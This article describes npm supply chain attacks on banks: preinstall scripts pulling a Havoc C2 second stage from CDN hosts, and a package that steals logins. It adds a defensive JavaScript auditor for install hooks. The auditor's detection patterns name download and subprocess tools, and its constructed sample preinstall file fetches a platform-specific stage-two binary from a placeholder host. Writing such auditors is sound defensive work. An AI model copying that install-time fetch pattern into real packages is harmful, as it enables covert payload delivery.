It’s time for the banking sector to fortify its defences against supply chain attacks and prioritise security to safeguard against the stealthy threats lurking in the open source landscape.
Cybersecurity researchers have made a concerning discovery in the world of finance – a surge in open source software supply chain attacks specifically targeting the banking sector.
According to a recent report by Checkmarx, these attacks employ advanced techniques, homing in on specific components of the targeted banks’ web assets. By attaching malicious functionality to those components, the attackers gain unauthorised access and wreak havoc on the financial institutions.
Attackers use fake LinkedIn profiles to appear more credible. They set up a personalised command-and-control (C2) server for each target, abusing legitimate services to host it, which makes their malicious traffic harder to distinguish from normal activity.
In one incident, the threat actor masqueraded as an employee of the targeted bank and surreptitiously uploaded packages to the npm registry. These packages contained preinstall scripts, which, once activated, set off the infection sequence. To further disguise their intentions, the attacker created a deceptive LinkedIn profile to deceive anyone scrutinising their activity.
Once the script was activated, it identified the host operating system and downloaded a second-stage payload from a remote server. Notably, the attackers served this payload from Azure CDN subdomains, evading traditional deny-list controls because Azure’s domains enjoy a legitimate reputation.
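The infection chain above hinges on npm lifecycle hooks that run automatically when a package is installed as a dependency, and on an install-time script that fingerprints the operating system and fetches a second stage. The following is an added example, not code from the Checkmarx report or the article: a small auditor that flags manifests declaring install hooks, follows `node <file>` commands into the package’s own files, and reports traits that warrant review (OS fingerprinting, network fetches, subprocess use, encoded blobs). The manifests, the file contents and the `cdn.example.invalid` host are all constructed for the example; the indicator list is a heuristic starting point, not an exhaustive signature set.

```javascript
// Added example: audit an npm package manifest (and the script files it invokes)
// for lifecycle hooks that run automatically at install time. Heuristic only:
// a finding means "inspect", not "malicious".

// Hooks npm runs without any action from the developer once the package is a dependency.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators checked against a hook's command line and the files it executes.
// Each entry: [pattern, what it suggests].
const INDICATORS = [
  [/\b(curl|wget|Invoke-WebRequest|iwr)\b/i, 'downloads content at install time'],
  [/https?:\/\//i, 'references a remote URL'],
  [/\bnode\s+-e\b/, 'runs inline JavaScript'],
  [/process\.platform|os\.platform\(|os\.type\(/, 'fingerprints the host operating system'],
  [/\bhttps?\.(get|request)\b|\bfetch\(/, 'performs an HTTP request'],
  [/child_process|\bexec(Sync)?\(|\bspawn(Sync)?\(/, 'spawns a subprocess'],
  [/base64/i, 'decodes or carries an encoded blob'],
  [/\bchmod\b|\bos\.tmpdir\(|\/tmp\//, 'writes to temp or marks files executable'],
];

// Return one finding per indicator that matches `text`, tagged with where it was seen.
function scan(text, location) {
  const findings = [];
  for (const [pattern, meaning] of INDICATORS) {
    if (pattern.test(text)) findings.push({ location, meaning });
  }
  return findings;
}

// Files a hook command runs via `node <file>` (inline `node -e` is excluded),
// so the auditor can look inside them instead of trusting the one-line command.
function invokedNodeFiles(command) {
  const files = [];
  const re = /\bnode\s+(?!-e\b)(\S+\.c?js)\b/g;
  let m;
  while ((m = re.exec(command)) !== null) files.push(m[1]);
  return files;
}

// pkg: parsed package.json. files: { relativePath: contents } for files shipped in
// the package (what a reviewer would extract from the tarball).
function auditLifecycleScripts(pkg, files = {}) {
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    findings.push({ location: `scripts.${hook}`, meaning: 'runs automatically on install' });
    findings.push(...scan(command, `scripts.${hook}`));
    for (const file of invokedNodeFiles(command)) {
      const key = file.replace(/^\.\//, '');
      if (files[key] === undefined) {
        findings.push({ location: key, meaning: 'invoked by hook but not present in the package contents provided' });
        continue;
      }
      findings.push(...scan(files[key], key));
    }
  }
  return findings;
}

// Collapse findings into a triage decision. The combination the article describes
// (install hook + OS check + network fetch) is treated as a blocking result regardless
// of how reputable the download host looks, since deny-listing by host is exactly
// what the CDN trick defeats.
function verdict(findings) {
  const hasHook = findings.some(f => f.meaning === 'runs automatically on install');
  const network = findings.some(f => /download|URL|HTTP/.test(f.meaning));
  const fingerprint = findings.some(f => /fingerprint/.test(f.meaning));
  if (hasHook && network && fingerprint) return 'block';
  if (hasHook && network) return 'review';
  if (hasHook) return 'inspect';
  return 'clean';
}

// Constructed sample inputs (not real packages).
const BENIGN = {
  name: 'example-ui-widget',
  version: '1.0.0',
  scripts: { build: 'tsc -p .', test: 'node test.js' },
};

const SUSPICIOUS = {
  name: 'example-bank-helper',
  version: '2.3.1',
  scripts: { preinstall: 'node setup.js' },
};
const SUSPICIOUS_FILES = {
  'setup.js': [
    "const os = require('os');",
    "const https = require('https');",
    "const { execSync } = require('child_process');",
    "const target = process.platform === 'win32' ? 'stage2.exe' : 'stage2';",
    "// constructed stand-in: fetches a platform-specific file from a placeholder host",
    "https.get('https://cdn.example.invalid/' + target, res => { /* ... */ });",
  ].join('\n'),
};

console.log(verdict(auditLifecycleScripts(BENIGN)));                      // clean
console.log(verdict(auditLifecycleScripts(SUSPICIOUS, SUSPICIOUS_FILES))); // block
```

Run it with `node audit.js` (any filename works) after pasting the block. In a real review the `files` map comes from the published tarball, not from the repository the package claims to be built from. The cheapest complementary control is to stop hooks running at all on build agents and developer machines with `npm config set ignore-scripts true` (or `npm install --ignore-scripts` per invocation) and to allow-list the handful of packages that genuinely need an install step.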
The second-stage payload responsible for the intrusion is Havoc, an open source command-and-control (C2) framework that has recently attracted malicious actors looking to evade the detection that better-known tools like Cobalt Strike, Sliver, and Brute Ratel tend to trigger.
In a separate but related attack in February 2023, another financial institution fell victim to a deceptive package uploaded to npm. This cunning package was designed to blend seamlessly into the bank’s website and remain dormant until activated. Once triggered, it quietly intercepted login data and sent it back to the attackers’ infrastructure, leaving the bank and its customers exposed.
The cybersecurity community is increasingly emphasising the need for supply chain security to protect the entire software creation and distribution process. Once a malicious open source package infiltrates the pipeline, it becomes an instant breach, rendering subsequent countermeasures less effective.
In addition to the open source software supply chain attacks, financial institutions are also grappling with the use of the web-inject toolkit drIBAN, which allows undetectable unauthorised transactions from a victim’s computer, bypassing the identity verification and anti-fraud mechanisms commonly used by the banks.
As the banking sector faces this evolving cyber threat landscape, cybersecurity experts are urging financial institutions to strengthen their defences, closely monitor their supply chains, and remain vigilant against malicious actors seeking to exploit vulnerabilities in the open source software ecosystem.